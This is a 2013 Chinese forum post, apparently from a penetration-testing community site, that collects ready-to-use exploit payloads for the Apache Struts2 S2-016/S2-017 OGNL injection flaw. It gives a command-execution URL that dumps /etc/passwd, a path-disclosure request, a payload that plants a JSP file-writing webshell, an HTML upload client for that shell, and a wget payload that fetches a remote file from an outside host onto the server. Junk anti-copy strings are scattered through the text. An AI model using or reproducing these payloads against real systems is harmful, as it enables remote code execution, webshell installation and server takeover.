中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]

---

作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了，，我就整理了一下。友情提示，自己小命比shell重要哦。。

  [9 h1 ?! p' L4 U9 @+ N喜欢就点一下感谢吧^_^
, Q. |  ?, {* r. |7 ]8 m! Y, ?
带回显命令执行：

3 M, e, B; T) ^http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}


: o; b) N3 g9 K3 y, i1 C- H& t/ f
: {1 p' s8 O8 e, h- g; T


9 P' F/ L. V/ P. z( G
; j# U/ c; p( x! s' ^: |" B爆路径：

http://www.example.com/struts2-b ... 8%29.close%28%29%7D
0 k- F( O8 o$ D6 [2 T  W0 R" p; `
( i- L" {  b! Y: M+ K) o6 J



* W* d" S# |, r0 q3 E2 b写文件：

# D; g8 b# }" W5 [6 x5 ?8 zhttp://www.example.com/struts2-blank/example/X.action?redirect:${

%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),

* q" P! E$ g: |new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()

}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

2 w: b: ~1 B* p

写入的文件内容：
  Q- Q4 X! k3 o0 Y9 T
2 j* e# K1 s5 Z2 E7 [' O* K# I<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      

7 L$ Q5 U9 b3 w* ~8 L* n其实就是一个jsp的小马，需要客户端配合                                                                                 
7 r/ M" M% \/ G
函数f是文件名，t是内容
* ?# N/ y* R6 |
$ u' l* a* p: U0 w, g, N5 T* }+ R客户端：
. U8 z3 E$ E; t- i" P
+ v6 O( c7 \* S) p; u( U<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
5 N7 w) K  G! Z  T: w
<textarea name=t cols=120 rows=10 width=45>your code</textarea>

<center>


9 ?2 ~* u: D- m/ C' s  x
<input type=submit value="提交">
9 \) b5 e  H* T1 Q" N5 @9 |
3 P% J/ o$ D' J: N" H$ z: ^' v2 Z</form>
1 R7 P# f) d, E% C
2 @7 b0 Q; z% P8 s就在当前目录建立一个fjp.jsp
9 c8 U( e3 \- p' Q$ R7 P( l
3 O. M0 N1 s. D  o$ X7 v- ]/ U* Xshell：http://www.example.com/struts2-blank/example/fjp.jsp
" h* w9 q" u9 y: _& g4 e1 J
3 m9 L7 c: e) N
" ^* u% Z/ B$ o5 g" r$ ~
, U5 _3 c5 B" _2 B还有@园长的一个客户端：

* U0 s1 T. U* C<html>

<head>

7 @5 |* {7 O* f* y+ a$ x) ?<meta http-equiv="content-type" content="text/html;charset=utf-8">
$ [7 C; Y3 S9 c/ ~
<title>jsp-园长</title>

4 }  f& M3 s0 e, u. |& K0 e</head>
$ h" G4 _0 Z4 P) f& s0 [' A
<style>

.main{width:980px;height:600px;margin:0 auto;}

5 q6 |; l/ X+ h' ~# ~, u; g.url{width:300px;}
* J9 J2 c4 N2 z9 n9 N; _
3 J/ {3 G' _: j: F.fn{width:60px;}

.content{width:80%;height:60%;}
( l; S7 j2 [) U6 q# N1 `! Z
</style>

+ t/ g& F$ M) B* d' w* k! l<script>
1 l4 X1 |( q. Z
: Q: V9 N4 g9 k; w" J# x! U4 U/ B  function upload(){
. }% K5 m5 U" H3 ^, J
    var url = document.getElementById('url').value,

+ l# }) j; D$ t) V4 l% K9 J      content = document.getElementById('content').value,

      fileName = document.getElementById('fn').value,
7 D3 `* e& j4 `2 m  U( T
+ g) R/ I3 c$ D      form = document.getElementById('fm');

2 O; e& J9 f+ g4 M. `    if(url.length == 0){
2 _* x0 ]$ d- F
      alert("Url not allowd empty!");
1 C: R+ n3 G, E$ A3 f
; p7 O# C* V, `, ~( S* N      return ;
6 c( X$ H4 y8 g( d1 d( a
    }
6 P% T9 ?* C, p* y. F
    if(content.length == 0){
: |' ]5 Q% G+ q5 a
      alert("Content not allowd empty!");
% _. i7 M1 Q8 u
      return ;

    }
/ E/ x# s5 u/ F4 K
    if(fileName.length == 0){

$ _8 ^4 ]" m3 y% p8 g" ^! L      alert("FileName not allowd empty!");

      return ;
0 X' t% e' p" U- q2 D, K% C3 e
    }

4 z9 R" N6 {4 P& w1 j) U    form.action = url;
; c& z0 r4 Z! B
- E* }1 b1 w& L0 T, h    form.submit();
5 u9 i6 V' I1 O
3 n* Y1 J0 B+ K: x4 b! G& f, y; O  }
2 q1 V- J- e8 j; J
</script>

<body>

<div class="main">

5 }" e9 Y* Y8 }3 T  <form id="fm" method="post">  
& J1 U" X2 {1 A. v4 v. n# v- _
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  

    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
' \: a! p. k1 [
( h4 p7 p& _  b7 K, W* O    <a href="javascript:upload();">Upload</a>


7 k7 P, }+ n6 I$ Q" ]
    <textarea id="content" class="content" name="t" ></textarea>

! s0 M- X* v( C$ Z  c  </form>

</div>
) o% F$ f5 k& b
</body>

</html>



还有@X发的一个wget的getshell
, z0 m  ^6 G6 \6 h; [) r& J
. m, }2 O" k0 |% e$ a?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
. M4 t% J/ X9 c, v7 r5 y2 g$ s
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
- u$ z1 ~5 R# J  A复制代码

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2